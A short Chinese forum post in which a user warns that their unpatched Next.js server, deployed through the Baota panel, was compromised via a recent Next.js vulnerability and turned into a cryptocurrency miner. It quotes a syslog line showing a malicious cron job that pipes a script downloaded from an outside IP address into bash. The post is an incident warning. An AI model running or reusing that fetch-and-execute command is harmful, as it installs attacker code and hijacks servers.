雾海藏月 (@wuhaicangyue) 在 【警示】我的服务器因为最近的 nextjs 漏洞被黑了 中发帖
省流:我的服务器被黑客利用最近的next漏洞做成了矿机
我在服务器部署了一个nextjs服务,就我们几个人的小工作室用的工具,没有用docker,是偷懒直接用宝塔部署的,前几天也看到了 nextjs 的漏洞,我以为我这没公开(实际已经挂上域名部署在公网了),没事,就懒得升级了。
结果今天小伙伴问我怎么网站就不去了,我一进网站一看,好家伙,cpu和内存直接给我拉满了:
[f19425dcde7ba02978de3f48f419a827]
于是请教 gemini 给我支支招,调查得到以下结果:
grep "CRON" /var/log/syslog
Dec 7 21:40:01 lavm-9sukhghlhp CRON[2275256]: (www) CMD (wget -q -O - http://80.64.16.241/re.sh | bash > /dev/null 2>...